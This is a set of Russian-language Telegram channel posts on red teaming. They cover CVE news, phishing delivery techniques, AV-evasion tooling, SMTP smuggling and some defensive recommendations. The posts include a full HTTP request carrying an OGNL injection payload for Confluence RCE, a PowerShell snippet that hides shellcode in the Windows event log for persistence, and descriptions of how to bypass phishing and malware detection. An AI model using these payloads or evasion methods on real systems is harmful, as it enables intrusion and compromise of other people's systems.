Ни для кого не секрет, что для атакующих существует достаточно много платформ для отработки практических навыков в лабораторной среде. А для защитников подобные решения можно буквально посчитать по пальцам, поэтому чтобы восстановить справедливость один мой хороший знакомый решил создать - https://defbox.io/

Привет!
Меня зовут Миша, я делаю defbox. В двух словах это “hackthebox наоборот”. Мы разворачиваем лабу и взламываем ее, а вы смотрите и реагируете на атаку в реальном времени.

У нас есть:
1. Бесплатные выделенные лабы под каждого пользователя
2. Достижения и флаги чтобы лабы было интересно изучать
3. Выделенный под каждого пользователя ELK - можно делать в нем что угодно и так учиться работать с ним
4. Система перезапуска всего - можно посмотреть что пошло не так, перезапустить и попробовать поймать атаку

В первую очередь мы делаем платформу для комьюнити, и нам очень важен ваш фидбек - пожалуйста, пишите мне в телеграм - @misha_community , на почту - m@defbox.io , любая обратная связь поможет нам сделать наш контент и платформу лучше

Подробнее можно прочитать здесь - https://habr.com/ru/articles/785712/
Зарегистрировать и попробовать можно здесь - https://defbox.io/

PS: От себя могу добавить, что фидбек и конструктивная критика пользователей на этапе разработки и реализации не только позволяет создавать хороший продукт, а дает возможность пользователем влиять на этот процесс, добавлять новую функциональность, дорабатывать существующие фичи и таким образом по факту определять направление дальнейшего развития.

Читать полностью…

Детали уязвимости CVE-2023-22527 (оценка по CVSS3.0=10), позволяющей получить RCE в Atlassian Confluence известны уже пару дней, но не все почему-то спешат обновлять свои сервера. 🤷‍♂️

Согласно данным Censys, которые обновляются ежедневно в отношении всего пространства IPv4, в нашей стране на сегодняшний день~3.6k скомпрометированных торчащих в интернет серверов Confluence. Технические детали уязвимости опубликованы в блоге ProjectDiscovery, эксплуатация позволяет не аутентифицированному злоумышленнику получить возможность исполнения произвольного кода путем SSTI инъекции OGNL (Object-Graph Navigation Language)

POST /template/aui/text-inline.vm HTTP/1.1
Host: сonfluence:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 285

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

⚙️POC: https://github.com/VNCERT-CC/CVE-2023-22527-confluence
🪲Уязвимые версии ПО: 8.0.x - 8.5.3
✅ Рекомендации: Патч уже доступен, необходимо ASAP обновиться до версии 8.5.3

#confluence #CVE-2023-22527

Читать полностью…

Hi, My Name is Keyboard

Сегодня хочу порекомендовать крутой свеженький ресерч от Marc Newlin, автора целого класса популярных атак MouseJack на беспроводные мыши и клавиатуры Logitech, Microsoft и других вендоров, которые даже через 8 лет с момента опубликования не теряют своей эффективности и являются отличным вектором для получения первоначального доступа на Red Team, без необходимости делать полноценный physical.

На этот раз под прицелом мастера оказался Bluetooth HID и как результат целая пачка CVE в разных ОС: macOS, iOS, Android, Linux (BlueZ), Windows, позволяющих подключать Bluetooth клавиатуру без аутентификации, участия и уведомления пользователя и запускать полезную нагрузку (inject keystrokes) в стиле MouseJack😎 И CVE-2024-0230 - уязвимость сопряжения (pairing process) Link Key между Magic Keyboard и Apple MacOS, эксплуатация которой позволяет подключиться к клавиатуре без аутентификации или к Mac от имени "волшебной" клавиатуры😜

Если коротко, то Bluetooth HID спаривание pairing работает следующим образом:
✅ Link Key - used to encrypt the data sent between two Bluetooth devices
✅ Pairing - establishes the link key
✅ Bonding - saves the link key to the device
✅ Out of Band Pairing - performs pairing and bonding over a non-Bluetooth channel like NFC or USB
✅ Pairing Capability - defines the authentication mechanisms supported by a host or peripheral

При этом инициировать сопряжение может сам подключаемый девайс, без необходимости аутентификации, если в качестве способа сопряжения на этапе Pairing (скрин выше) используется NoInputNoOutput (для устройств типа мышей, без функциональных кнопок и дисплея)🙊

Таким образом, возможно реализовать RCE через Force-pairing и Keystrokes injections на macOS и iOS (paired c Magic Keyboard), Android (zero-click), Linux (zero-click), Windows (almost zero-click) хостах, при этом Android 4.2.2 - 10, iOS 16 и macOS 12-14.2 никогда уже не получат патчи, исправляющие эту уязвимость🙈

Детали исследования:
✅ Доклад Marc Newlin на Shmoocon 2024 - https://youtu.be/3xn_TmTIT4Q?t=16255
✅ POC под каждую ОС - https://github.com/marcnewlin/hi_my_name_is_keyboard
✅ Affected Versions - https://github.com/skysafe/reblog/blob/main/cve-2024-0230/README.md#known-affected-versions-1

Читать полностью…

Shorts про Tailgating😄 c прошлогоднего эфира AM Live - Психологическая безопасность сотрудников и бизнеса
Лайк, подписка, колокольчик! 🙏

Читать полностью…

Large Model Systems Organization

В пятницу первой рабочей недели предлагаю продолжить тему использования LLM в своей повседневной деятельности.
В прошлом году я уже писал про CodeLlama, которая умеет в код на Python, C++, C#, Java, PHP, Typescript (Javascript) и обучалась на специализированных датасетах, но использовать ее на HuggingFace не очень удобно, а чтобы поднять локально необходимо значительные вычислительные ресурсы.

Поэтому хочу порекомендовать проект https://chat.lmsys.org/, который позволяет с помощью браузера получить доступ к большому количеству различных проприетарных и открытых моделей (28 моделей, в том числе ChatGPT-4, ChatGPT-3.5 и Claude-v1) абсолютно бесплатно, без регистрации и VPN. Это некоммерческая платформа с веб интерфейсом, API и CLI c открытым исходным кодом от Large Model Systems Organization университета UC Berkeley с целью сделать использование LLM доступным всем желающим. Также целью этого исследования является создания benchmark для сравнения эффективности существующих моделей на основе анонимного голосования пользователей по опыту использования на платформе.

Мне очень нравится функциональность Chatbot Arena, где можно выбрать 2 любые модели из списка и получать, сравнивать ответы и работать с ними одновременно, в параметрах можно задать temperature (случайность сгенерированного результата), выборку Top-P (выбор токенов из вариантов с наибольшей вероятностью) и max output tokens. Можно поиграться с разными моделями и параметрами для решения различных прикладных задач, выбрать своих фаворитов и поделиться своим опытом на платформе и в комментариях под этим сообщением😊

А для тех кому интересна безопасность LLМ, исследования, уязвимости, способы эксплуатации и прочее из мира AI/ML Security рекомендую отличный тематический канал моего хорошего товарища - /channel/pwnai

PS: Желаю всем удачного окончания недели и отличных выходных!

Читать полностью…

Поздравляю с наступающим Новым годом!🥳🥳🥳
 
🎉 Желаю волшебных моментов, ярких впечатлений и невероятных приключений в новом году! Пусть каждый день будет наполнен радостью, удачей и новыми возможностями!

🎉 Желаю, чтобы каждому удалось осуществить все свои мечты и достичь поставленных целей!
 
🎉 Здоровья и счастья Вам, ведь это самые важные составляющие полноценной жизни. Пусть близкие будут рядом, поддерживая и вдохновляя на новые свершения, а в каждом мгновении будет много поводов для радости!

🎉 Желаю, чтобы новый год принёс множество интересных открытий, приятных сюрпризов и важных событий. Пусть он станет для Вас временем больших достижений, успеха и благополучия!

С наступающим Новым годом!🎉🎉🎉 До встречи в 2024❤️

Читать полностью…

Honeypots Detection

Использование ханипотов - это один из самых популярных и распространённых методов Cyber Deception, в последнее время, с целью замедления и своевременного обнаружения атакующих. Существуют целые фреймворки для реализации этой цели, об одном из таких решений мы уже писали.

Поэтому, думаю многим пригодится этот репозиторий шаблонов для nuclei от Sheila Ayelen Berta для обнаружения популярных ханипотов с открытым исходным кодом. Репозиторий содержит темплейты для идентификации: ADBHoney, ElasticPot, Cowrie, Conpot, Dionaea, Mailoney, Redis Honeypot, Snare.

#red_teaming #cyber_deceprion #honeypots_detection

Читать полностью…

Выход VIP Edit версии на мою статью Save Me. Безопасность сетевого оборудования, внешнего периметра.

Caster - Save Me (Caster VIP Remix)

Genre: Defensive
Subgenre: DHCP Security, FHRP Security, DP Security, VLAN Security, RMI Security, Passwords Protection, SNMP Security, ICMP Filtering, NAT Security, Port Forward Evade, UPnP Evade
Label: xakep.ru
Release Date: 22 December 2023

Link: xakep.ru/2023/12/22/network-safety-tips

Читать полностью…

Avred - Analyse your malware to surgically obfuscate it

Современные антивирусные защитные решения, в том числе EDR/XDR/Sandox (далее просто AV) представляют собой совокупность статических методов обнаружения с эвристическим и поведенческим анализом, облачными песочницами и регулярным сканированием памяти, а также прочими ML и AI технологиями😎 Поэтому вендорам AV постоянно приходится находить оптимальный баланс между эффективностью и UX опираясь преимущественно на сигнатурный анализ, как наиболее явный критерий, который уже тригерит дополнительные проверки, поэтому сбить сигнатуры является первым шагом в любой методологии обхода AV.

Раньше при решении подобной задачи первыми инструментами был ThreatCheck от Rasta Mouse и Avdebugger/Avcleaner от Vladimir Meier. Но у этих замечательных инструментов есть ряд ограничений, как минимум в части удобства работы с зоопарком виртуалок с различными AV. По крайней мере именно это и подтолкнуло меня провести поиски достойных альтернатив.

Avred - это инcтрумент на python, который по архитектуре представляет собой сканер - avred и avred-server, который устанавливается на виртуалке с любым AV и принимает файлы для проверки с помощью AMSI по HTTP REST API из единого веб интерфейса. Принцип работы заключается в выявлении совпадений по сигнатурам, аугументации вывода и некоторой автоматизации замены. Умеет работать с PE .exe, .NET PE .exe, а также .docm и .ps1
Потыкать можно - https://avred.r00ted.ch/ (defender/avira/avg)

Рекомендую так же отличный доклад на HITB2023 от автора инструмента Dobin Rutishauser - Analyzing And Reverse Engineering Antivirus Signatures (продолжительностью ~ 67 мин). Слайды доступны по ссылке.

Читать полностью…

Windows Event log for Persistence

Многим скорее всего знакома техника записи/чтения шелкода в/из ивентов в Windows event log, которые хранятся в \HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ для обеспечения Persistence. Большинство скорее всего используют для этого утилиту SharpEventPersist, которая создает Event ID 1337 и записывает shellcode.bin в hex в описание (General) в Event Properties и выполняется с помощью .NET ExecuteAssembly

Но немногие знают, что пейлоад можно записать в бинарном формате (byte array) в детали (Details) в Event Properties, это позволяет увеличить размер с 31.839 bytes до 61.440 bytes для хранения полезной нагрузки.

$payload = 'shellcode as hex'

# Convert Payload variable to hex byte array
$bytes = [byte[]] ($payload -replace '..', '0x$&,' -split ',' -ne '')

# Create new event log entry
Write-Event -LogName 'Key Management Service' -Source KmsRequests -EventID 1337 -EventType Information -Category 0 -Message 'RedTeam was here' -RawData $bytes

Далее прочитать, используя Powershell или .NET и выполнить любым привычным способом😎

Для записи в логи System необходимы права локального админа, в логи Application и Custom можно писать с правами Interactive user https://learn.microsoft.com/en-us/windows/win32/eventlog/event-logging-security

Техника далеко уже не новая и использовалась злоумышленниками в дикой природе, но служит для реализации Persistence не самым тривиальным способом и позволяет передать привет защитникам😜

#windows_event_log #persistence #red_teaming

Читать полностью…

Зимние, ☃️снежные выходные идеальное время для просмотра записей докладов с прошедшего Standoff Talks, которые я проспал не удалось послушать вживую. В этом году Standoff Talks и кибербитва Standoff проходили в рамках масштабного недельного мероприятия Moscow Hacking Week, а это целая неделя интересных и полезных докладов для начинающих и опытных хакеров.🤩

Начнем с крутого доклада Александры Антипиной aka N3M351DA - Cult of Infrastructure, про подход к созданию атакующей инфраструктуры для участия в кибербитве Standoff команды Cult (кстати отдельный респект за Cult of the Dancing Cow, я оценил отсылку ☠️🐮):

🔴 Cегментирование отдельных компонентов инфраструктуры для решения определённых задач.
В рамках Standoff ребята создают отдельные сегменты инфраструктуры под атакуемые компании киберполигона, чтобы более организованно подходить к реализации недопустимых событий. Похожий подход мы используем на Red Teaming проектах, создавая отдельные сегменты инфраструктуры под определенные задачи в рамках различных этапов тестирования: получение первоначального доступа, закрепление, пост-эксплуатация и эксфильтрация данных, с целью обеспечения повышенных требований OpSec и особенностей менеджмента проектов.
🔴 Создание кастомных профилей сетевого взаимодействия имплантов/агентов с C2 серверами управления, для обеспечения evasion на уровне сетевой коммуникации. Особенно понравилось про wildberries из сегмента банка👍
Это очень важно, несмотря на "игровой" формат кибербитвы Standoff, на полигоне есть серьезные СЗИ и защитники, которые знают что их атакуют именно здесь и сейчас. Поэтому это добавляет сложности, в отличии от реальных проектов, так как многие знают, что ночью в субботу SOC обычно спит лучшее время для активных действий в рамках пост-эксплуатации😜
🔴 Подготовка инструментов и devops подход к созданию пейлоадов.
🔴 Для участия в кибербитве команда Cult ежегодно тратит ~333,333 в эквиваленте стоимости термобутылки😄 из мерча Standoff.

Таким образом, сразу видно что ребята с душой и полной отдачей подходят к соревнованиям👍 Остается только пожелать им удачи и первого места🥇на следующей кибербитве Standoff.

Ссылка на презентацию - https://disk.yandex.ru/i/3rMIxGL2Zp92yQ
Канал N3M351DA в телеграм - /channel/in51d3

Читать полностью…

Я выпускаю релиз новой версии 2.1 моего сниффера Above.

Caster - Above 2.1 (Codename: Vivid)

Genre: Offensive, Defensive
Subgenre: Penetration Testing, Network Security
Label: github.com
Release Date: 28 November 2023

Инструмент стал работать в несколько раз быстрее, теперь анализ протоколов на безопасность происходит одновременно;
Полностью переписан на основе Scapy, поддержка 12 сетевых протоколов канального и сетевых уровней, вместе с L7;
Добавлена функция поиска 802.1Q-тегов для обнаружения проблем безопасности сегментации;
В силу его специфики работы - его невозможно обнаружить во внутренней сети;
Добавлена поддержка Windows;
Устранены баги.

Данный релиз также предназначен для отправки инструмента в Kali Linux. Займусь этим в ближайшее время.

Link: github.com/wearecaster/Above
Release Link: github.com/wearecaster/Above/releases/tag/vivid

Читать полностью…

🟣 Фиолетовый — это новый красный, утверждает Вадим Шелест (на момент съемок — ведущий эксперт отдела анализа защищенности МТС Red, а теперь — руководитель Red Team, Wildberries).

В новом выпуске AM Talk говорим о Purple Teaming как о новом подходе к оценке и формированию эффективной стратегии киберзащиты.

▶️ Вспомним, как зарождается и прогрессирует сущность ИБ, почему Purple Teaming эффективнее "красного" на среднем уровне зрелости компаний и причем тут культовая Nokia 3310.

Ждем ваших комментариев ↩️

Читать полностью…

Snyk Security - Code, Open Source Dependencies, IaC Configurations

Утром понедельника предлагаю поговорить про то как прошли выходные сканирование исходного кода на уязвимости😎

В рамках проектов по анализу защищенности методом whitebox или реализации недопустимых событий/бизнес-рисков в рамках сценариев supply chain атак часто необходимо искать уязвимости в коде и для этой цели существует довольно много SAST проектов с открытым исходным кодом под разные языки и фреймворки, а также коммерческих решений отечественных и иностранных вендоров. Но иногда необходимо быстро просканировать код open source проекта или свою поделку, чтобы перед коллегами стыдно не было🙈 Недавно для подобных целей я открыл для себя бесплатный инструмент - расширение для Visual Studio Code - Snyk Security

✅ Поддерживаемые языки и фреймворки: C#, JavaScript, TypeScript, Java, Go, Ruby, Python, Ruby, PHP, Scala, Swift, Objective-C
✅ Поддерживаемые ОС: Linux (AMD64/ARM64), Windows (386/AMD64), MacOS (AMD64/ARM64)
✅ Умеет искать уязвимости:
Open Source Security - security vulnerabilities and license issues in both direct and in-direct (transitive) open-source dependencies.
Code Security and Code Quality - security vulnerabilities and quality issues in your own code.
Infrastructure as Code (IaC) Security - configuration issues in your IaC templates (Terraform, Kubernetes, CloudFormation, and Azure Resource Manager).

На бесплатном уровне подписки имеет ограничения: на open source - 200 сканов/мес; своих проектов - 100 сканов/мес; IaC - 300 сканов/мес; контейнеров - 100 сканов/мес

Расширение автоматически устанавливает Snyk CLI, требует аутентифицироваться в app.snyk.io и отправляет копию сканируемого проекта в облако Snyk, которую согласно документации хранит в течении 24 часов.
Поэтому не рекомендую использовать это расширении при работе с исходным кодом клиентов во время проектов.
А для open source, pet-projects и CTF'ов вполне себе неплохо работает, показывает конкретные риски и примеры эксплуатации, а также варианты митигации найденных уязвимостей.

Читать полностью…

Специалист по анализу защищенности/Red Team, Wildberries

Уровень: Senior/Middle
Формат: удаленка или гибрид

Вместе с масштабным развитием IT направления, Wildberries развивает информационную безопасность.
Мы решаем сложные и разнообразные задачи: от повышения защищенности каждого сервиса до развития безопасности в рамках всей нашей инфраструктуры.

А наша инфраструктура - это 100+ складов и сортировочных центров, а также десятки тысяч серверов.
Мы хотим обеспечить повсеместную безопасность и поэтому развиваем внутреннюю Red Team и нам нужны сильные специалисты по тестированию на проникновение.

Детальнее о задачах:

• Участие в проведении Red Teaming проектов: симуляция действий атакующих в режиме сокрытия своего присутствия и активного противодействия со стороны подразделений SOC
• Участие в проведении Purple Teaming проектов: эмуляция действий атакующих по MITRE с целью тестирования методов обеспечения информационной безопасности бизнес-процессов и оценки эффективности деятельности подразделений SOC
• Формирование рекомендаций по оптимизации процессов и методов обнаружения, реагирования и противодействия подразделений SOC
• Участие в проведении проектов по тестированию на проникновение внешней и внутренней инфраструктуры
• Участие в проведении социо-технических этапов тестирований на проникновение
• Участие в проведении проектов по тестированию на проникновение веб/мобильных приложений
• Формирование рекомендаций и компенсирующих мер на основе векторов эксплуатации найденных уязвимостей

Необходимые опыт и навыки:

• Опыт в проектах по тестированию на проникновение (внешняя и внутренняя инфраструктура, в том числе СУБД, системы виртуализации и контейнеризации)
• Опыт в проектах по анализу защищенности веб/мобильных приложений (blackbox/graybox)
• Опыт в проектах по аудиту безопасности исходного кода
• Опыт в проектах по анализу защищенности беспроводных сетей
• Опыт поиска и эксплуатации уязвимостей ОС Linux, а также специфичных для них сервисов
• Опыт поиска и эксплуатации уязвимостей стека сетевых протоколов
• Знание любого языка программирования на уровне достаточном для автоматизации задач
• Понимание и практический опыт использования стандартов и методологий (PTES, OWASP, MITRE ATT&CK)
• Понимание принципов работы современных веб/мобильных приложений
• Понимание принципов работы и построения сетей
• Понимание принципов работы современных ОС и возможностей для повышения привилегий

Будет плюсом:

• Наличие профильных сертификатов (OSCP, OSWE, OSEP и пр.)
• Выступления на профильных конференциях/митапах
• Участие в CTF и Bug Bounty программах
• Опыт администрирования Linux-систем, сетевого оборудования, систем оркестрации
• Опыт коммерческой разработки веб/мобильных приложений

Мы предлагаем:

• Гибкое начало рабочего дня и гибридный формат работы: от офиса в Москве (с бесплатными завтраками, обедами и ужинами) до полной удаленки
• Вариативность оформления: трудовой договор, ИП или ГПХ
• Корпоративные скидки у партнеров, внешние программы по обучению и внутренние митапы
• Ежегодная 40%-ая скидка на покупку ноутбука или мобильного телефона

Контакты: @iul_naidenova

Читать полностью…

Frameless BITB

Browser in The Browser - хорошо знакомая техника получения учетных данных для первоначального доступа во время проведения фишинговых компаний, придуманная mr.d0x в 2022 году. Суть этой техники заключается в создании на фишинговой странице HTML iframe элемента, который имитирует редирект на страницу логина Microsoft для OAth2.0 авторизации в новом окне браузера. Эта техника будет работать при отсутствии X-Frame-Options: "DENY"/Content-Security-Policy: frame-ancestors "self"

По этой причине пытливый ум одного исследователя придумал тоже самое, только без iframe. Имитация "нового окна браузера" для логина Microsoft создается с помощью подстановки HTML, CSS с прокси перед проксей с Evilginx 🙈 и JS который добавляет эффект правдоподобности, а также фоном фишинговой страницы в Shadow DOM. Так же автор опубликовал код на github и подробную видео инструкцию с деталями использования на примере O365 Microsoft.

Обычно на проектах мы использовали другую технику BITB noVNC в киоске, с небольшой кастомизацей, которая по моему мнению намного проще и эффективнее, но мне понравился претекст с использованием Calendly👍

PS: Лайк, если хочется увидеть отдельную заметку про BITB noVNC🤙

#phishing #BITB

Читать полностью…

Еще один Shorts про физический доступ на Red Team'ах с эфира AM Live - Психологическая безопасность сотрудников и бизнеса
Кстати, если кому-то интересно, тут тема тапочек раскрыта в подробностях😂
Лайк, шер, репост! 🙏

Читать полностью…

Bob the Smuggler

HTML Smuggling, всем известная техника доставки пейлоадов в рамках фишинга для получения первоначального доступа во время Red Teaming активно используется с 2018 года и не теряет своей эффективности по сей день🙈
Про суть этой техники можно почитать в блоге ее авторов из компании Outflank, ну и я тоже рассказывал об этом на PHDays12 в прошлом году.

Буквально на прошлой неделе появился Bob the Smuggler - инструмент для автоматизации создания HTML страницы с запароленным и зашифрованным XOR 7z/zip архивом и картинкой в формате png/gif внутри которой спрятана полезная нагрузка в exe/dll🙊

🔴 Хостим созданную картинку на внешнем сервере
🔴 Отправляем жертве архив, при распаковке которого и открытию HTML страницы JavaScript загружает картинку
🔴 JavaScript расшифровывает и создает из JavaScript blob объект и кладёт наш пейлоад в папку загрузки
🔴 Дальше все зависит от выбранного претекста, ограниченного лишь фантазией оператора
🔴 MOTW отключен в 7z по умолчанию, если запускать файл прямо из архива, без предварительной распаковки, поэтому если в качестве дополнения претекста будет соответствующая "подробная инструкция", то MOTW тоже легко обходится😎

❓Что делать:
🔴 Атакующим: TheCyb3rAlpha/bobthesmuggler-your-covert-cyber-swiss-knife-for-undetectable-payload-delivery-bc84f3037522">Статья автора утилиты
🔵 Защитникам: Рекомендации общего характера

#phishing #html_smuggling #red_teaming

Читать полностью…

Мы уже обсуждали способы противодействия автоматизированным средствам обнаружения фишинговых страниц во время проведения социо-технических этапов пентестов, а также рекомендации и способы защиты от фишинговых атак с обходом MFA, поэтому еще один раз точно лишним не будет😄

Недавно мне на глаза попалась статья с описанием методов затруднения обнаружения и идентификации Gophish с использованием легитимных инструментов Cloudflare доступных на бесплатном уровне подписки, а именно:

🔴 JavaScript challenge aka Under Attack mode - подобие капчи для защиты от L7 DDoS атак
🔴 Geo-blocking - правила WAF для блокировки по гео принадлежности источников запросов
🔴 JavaScript detections aka Bot Fight mode - антибот от Cloudflare
🔴 Meta refresh - HTML element, который инструктирует браузер совершить редирект через определенное время + HTML обфускация
<meta http-equiv="refresh" content="5; url=https://example.com/">

Рекомендации для защитников:
🔵 Passwordless аутентификация WebAuthn и hardware-based MFA с использованием FIDO2/U2F
🔵 24/7 мониторинг зарегистрированных схожих доменных имен и TLS сертификатов с использованием коммерческих сервисов и логов Certificate Transparency
🔵 Регулярные мероприятия в формате Security Awareness для повышения осведомлённости пользователей
🔵 Регулярные социо-технические тестирования силами внутреннего подразделения или сторонних подрядчиков

🔴 Таким образом, подобные методы атакующих совсем не новые и уже много лет используются, но использование легитимных сервисов Cloudflare позволяет существенно снизить порог вхождения для злоумышленников и экономит время на защиту фишинговой инфраструктуры.
🔵 А для защитников наибольшую эффективность дают перечисленные, проверенные временем, комплексные меры по противодействию этому классу атак.

#phishing #gophish

Читать полностью…

Матрица компетенций

Всем привет! Надеюсь, что все хорошо отдохнули, набрались сил и готовы к покорению новых профессиональных и карьерных вершин🏆

В нашей отрасли очень много направлений для профессионального роста и развития навыков и компетенций, поэтому очень часто особенно у новичков возникает закономерный вопрос, какой путь выбрать, что и в какой последовательности изучать?! 😜
Но сначала все таки нужно определиться с целями и направлением развития, а потом качать соответствующие навыки и компетенции. О целеполагании и приоритетах мы поговорим в следующих заметках в рамках этой новой менеджерской рубрики😎

А сейчас, немного забегая вперед рассмотрим методы достижения цели повышения грейда offensive security специалиста. Я уже рассказывал про такой инструмент, как матрица компетенций от компании DETEACT, а сегодня я бы хотел пошарить черновик нашей подобной матрицы.

Это пока только лишь верхнеуровневая структура, в планах детально описать каждый этап относительно хард и софт скиллов с подробными рекомендациями по развитию (референсы на литературу, статьи, лабы и прочее) чтобы было удобно иметь под рукой план развития для каждого грейда. А также добавить ключевые управленческие компетенции необходимые для эффективного менеджмента команды.

PS: Можно оставлять комментарии и предложения прямо в доке, ну и финальную версию обязательно расшарю для публичного доступа без ограничений

Читать полностью…

PurpleBear 2023 ➡️ PurpleBear 2024

В конце уходящего года обычно принято подводить итоги и строить планы на следующий год, но прежде хочу выразить слова благодарности всем читателям!❤️

Большое спасибо всем, кто читал, лайкал и комментировал мои посты, именно благодаря вашему участию и поддержке канал развивается и нас уже более 500 человек🎉
От души благодарю каждого из Вас!🙏

Итоги 2023
За чуть более пол-года существования канала:
✅ опубликован 171 пост
✅ средняя частота публикаций - 2-3 раза в неделю
✅ наиболее интересные темы публикаций - red/purple teaming, pentest, инструменты и техники атакующих и защитников

Планы 2024
✅ публиковать посты чаще
✅ добавить интерактива и лонгриды
✅ разнообразить темы публикаций и формат взаимодействия в чатике
✅ начать записывать видео ролики по инструментам и техникам атакующих и защитников

Оставляйте свои пожелания и предложения по темам публикаций, контенту и чему угодно в комментариях!

PS: Желаю удачного окончания года и веселой предпраздничной суеты!🎉

Читать полностью…

SMTP Smuggling

Давно мы уже не рассматривали новые уязвимости, поэтому в сегодняшней заметке речь пойдет про SMTP Smuggling.
Тем более это не просто очередная CVE, а фактически новый вид атаки на протокол SMTP, которая позволяет спуфить адрес отправителя при рассылке фишинговых сообщений.

Согласно опубликованному исследованию SEC Consult Vulnerability Lab реализация атаки позволяет отправлять письма с любого адреса, обходя механизмы безопасности SPF, DKIM и DMARC, которые призваны обеспечить проверку аутентификации отправителя.

Суть атаки заключается в разнице имплементации протокола SMTP, когда outbound (отправитель) и inbound (получатель) SMTP серверы некорректно обрабатывают <CR><LF>.<CR><LF>" (Carriage-Return\Line-Feed aka \r\n.\r\n) в Message data, т.е тексте сообщения. Таким образом если отправить <LF>.<CR><LF> т.е \n.\r\n некоторые inbound SMTP интерпретируют это не как конец сообщения и позволяет отправить следующее сообщение от адреса другого отправителя в заголовке FROM, а так как SMTP сессия уже установлена, проверка аутентификации теперь не требуется.

Другими словами мы можем отправить письмо от имени любого пользователя почтового сервера в обход DKIM, DMARC и спам фильтров. То же самое работает если мы отправляем smugglеd сообщение с уязвимого outbound SMTP сервера в обход SPF, причем даже автоматически подтянется валидная картинка профиля (profile picture) заспуфленного почтового аккаунта.😎

Оказывается в интернете миллионы уязвимых к атаке SMTP Smuggling почтовых серверов разных компаний использующих Postfix и Sendmail, в том числе крупных публичных почтовых сервисов outlook.com, gmx.net и пр. Авторы исследования приложили максимум усилий для responsible disclosure уязвимости, но например в Cisco Secure Email Cloud Gateway багу не оценили, назвали "фичей" и патчить отказались...а этот софт использует 40k почтовых доменов, включая amazon, cisco, paypal, ebay и даже irs.gov 🙈

Таким образом, получилась очень интересная бага, отличный подробный райтап процесса исследования и крутейший пример того как можно найти новые баги в SMTP даже в 2023 году👍

Читать полностью…

MAAS - Malware As A Service

В продолжении темы Red Teaming инфраструктуры, хочу поделиться мыслями относительно применения автоматизации для создания и кастомизации полезной нагрузки в лучших традициях DevOps😎. Ни для кого не секрет, что malware development - это отдельная область компетенций в наборе навыков участников команды и далеко не каждый Red Team оператор всегда является разработчиком ПО, способного обеспечивать требования evasion для обхода защитных решений. Поэтому в последнее время на Западе набирает обороты концепция Offensive Security Tooling as a Service, когда разработку и кастомизацию инструментария берут на себя выделенные команды на аутсорсе, например, по этой модели работают MDSec и Outflank. В нашей стране об использовании подобной практики я не слышал, так как это скорее всего требует особой лицензии ФСТЭК сомнительно с точки зрения законодательства.

Поэтому можно призвать на помощь ChatGPT Python и построить собственный лунапарк с CI/CD и контейнерами или использовать проекты с открытым исходным кодом - MAAS (Malware As A Service) от Joff Thyer из BHIS.
MAAS - это инструмент создания пайпланов автоматизации для генерации пейлоадов с использованием методов затруднения сигнатурного анализа (encryption, obfuscation и пр.) с помощью Gitlab Runners. В текущей версии представляет собой docker-контейнеры сo ScareCrow и Garble под управлением docker swarm для создания и обфускации полезной нагрузки в форматах exe/dll (managed/unmanaged), rdll, xll и упаковки в Click Once и MSIX/APPX. Крутится это все должно на виртуалках Ubuntu 22.04.3 с 40GB RAM, 8xCPU Cores, 100GB и Windows с 32GB RAM, 4xCPU Cores, 100GB
Доклад автора можно посмотреть по ссылке (продолжительность ~ 80 мин). Слайды презентации доступны по этой ссылке.

Таким образом, инструмент представляет собой по сути фреймворк, который можно адаптировать под необходимую функциональность. На данный момент в процессе тестирования, в следующих постах расскажу более подробно про свой опыт использования.

#malware_development #MAAS #red_team_infra

Читать полностью…

Продолжая обзор докладов со Standoff Talks, хочу порекомендовать доклад Жасулана Жусупова aka cocomelonc - Разработка вредоносных программ криптография

В докладе речь идет про исследование применения классических криптографических алгоритмов для шифрования полезной нагрузки. Мне очень интересно было посмотреть на результаты использования "морально устаревших" Skipjack, TEA, Madryga, RC4, A5/1, DES для шифрования пейлоадов относительно статического анализа антивирусных решений. Криптографию принято считать очень обособленной областью знаний в нашей отрасли, на погружение в которую нужно огромное количество времени и усилий, поэтому большое спасибо автору за этот ресерч относительно прикладного применения классических алгоритмов в области обеспечения evasion👍

К тому же у cocomelonc буквально вчера вышла новая книга MALWILD, все вырученные средства от которой пойдут на лечение детей болеющих онкологическими заболеваниями. 

"Весь материал в книге основан на моих постах из блога WebSec, журнала HVCK, блога MSSP Lab и моих собственных статей.
В посте есть ссылки на биток, visa/mastercard, paypal итд
Я сам не мог пройти мимо так как сам через это прошел и знаю что такое когда дети болеют, кто читал мою книгу MD MZ по malware development знают о чем я. Благодарю всех неравнодушных" (c) cocomelonc

Читать полностью…

Вчера принимал участие в дискуссии AM Live - Психологическая безопасность сотрудников и бизнеса, о том как психологический климат в коллективе и стиль управления связаны с киберустойчивостью компании и наоборот.

Тема очень обширная и интересная и несмотря на то, что я не специалист в области HR, психологии или права, а выступал в большей степени со стороны технической экспертизы относительно социо-технических этапов Red Teaming и тестирований на проникновение, у нас получился вполне конструктивный разговор, относительно важности аспектов психологической безопасности в построении эффективной стратегии защиты компаний от киберугроз.😎
Приятного просмотра!

Читать полностью…

ClickOnce AbUse for Trusted Code Execution

Мы неоднократно обсуждали различные варианты транспорта🚃 для пейлоадов на этапе получения первоначального доступа с помощью фишинга, поэтому еще один лишним точно не будет. Про ClickOnce известно уже давно, в 2017 году bohops опубликовал отличный поcт на эту тему, но я раньше никогда всерьез не рассматривал ClickOnce в качестве вектора для initial assess, пока не посмотрел доклад DEF CON 30  - Nick Powers, Steven Flores  – ClickOnce AbUse for Trusted Code Execution

Согласно MSDN, “ClickOnce is a deployment technology that enables you to create self-updating Windows-based applications that can be installed and run with minimal user interaction.”

Другими словами это .NET приложение, которое может быть установлено при переходе по HTTP(S)/UNC ссылке🙈 скачивается файл с расширением .application в MS Edge и .appref-ms в Chrome/Firefox и запускается с минимальным количеством кликов со стороны жертвы😎 Сохраняется в C:\Users\%USERNAME%\AppData\Local\Apps\2.0\<random> и запускается с помощью dfsvc.exe.

